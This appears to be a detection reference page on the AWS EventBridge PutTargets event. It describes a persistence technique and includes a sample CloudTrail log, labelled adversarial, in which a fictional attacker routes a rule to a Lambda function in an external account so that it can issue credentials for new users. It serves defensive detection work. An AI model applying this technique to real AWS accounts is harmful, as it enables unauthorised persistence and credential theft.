Skip to content

PutTargets

AWS

PutTargets

service: AWS - EventBridge
tactics:
techniques:

Event

Attaches execution targets to an EventBridge rule, connecting event triggers to attacker-controlled compute.

Security Context

  • Adding targets to an EventBridge rule completes the persistence chain by connecting event patterns to execution endpoints such as Lambda functions, ECS tasks, or cross-account event buses.
  • This event is often paired with PutRule — an adversary creates a rule to match specific events and then attaches a target that executes their payload whenever the rule triggers.

Log Source

CloudTrail

Sample Event

Adversarial. Continuation of the prior PutRule event: Draco wires the phoenix-restore-watch rule to a Lambda in his own external account (555666661337) — arn:aws:lambda:us-east-1:555666661337:function:phoenix-credential-issuer. Cross-account Lambda invocation from EventBridge requires only that the target Lambda’s resource policy allow it; nothing else in the victim account changes. Every CreateUser will now fire this Lambda, which can then issue access keys for the new user via the persona-doc adversary account. Same session/credentials as the prior event.

{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDADRAC0MALF0YBADGY",
"arn": "arn:aws:iam::555123456789:user/draco",
"accountId": "555123456789",
"accessKeyId": "AKIADRAC0MALF0YEXAMP5",
"userName": "draco",
"sessionContext": {
"attributes": {
"creationDate": "2026-04-15T18:51:02Z",
"mfaAuthenticated": "false"
}
}
},
"eventTime": "2026-04-15T19:28:42Z",
"eventSource": "events.amazonaws.com",
"eventName": "PutTargets",
"awsRegion": "us-east-1",
"sourceIPAddress": "203.0.113.66",
"userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6",
"requestParameters": {
"rule": "phoenix-restore-watch",
"eventBusName": "default",
"targets": [
{
"id": "1",
"arn": "arn:aws:lambda:us-east-1:555666661337:function:phoenix-credential-issuer"
}
]
},
"responseElements": {
"failedEntryCount": 0,
"failedEntries": []
},
"requestID": "90000000-0000-4000-8000-000110010110",
"eventID": "90000000-0000-4000-8000-000110010111",
"readOnly": false,
"eventType": "AwsApiCall",
"managementEvent": true,
"recipientAccountId": "555123456789",
"eventCategory": "Management",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "events.us-east-1.amazonaws.com"
}
}

MITRE ATT&CK Mapping

Tactics: Persistence

Techniques:
  • T1546 — Event Triggered Execution — Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cl...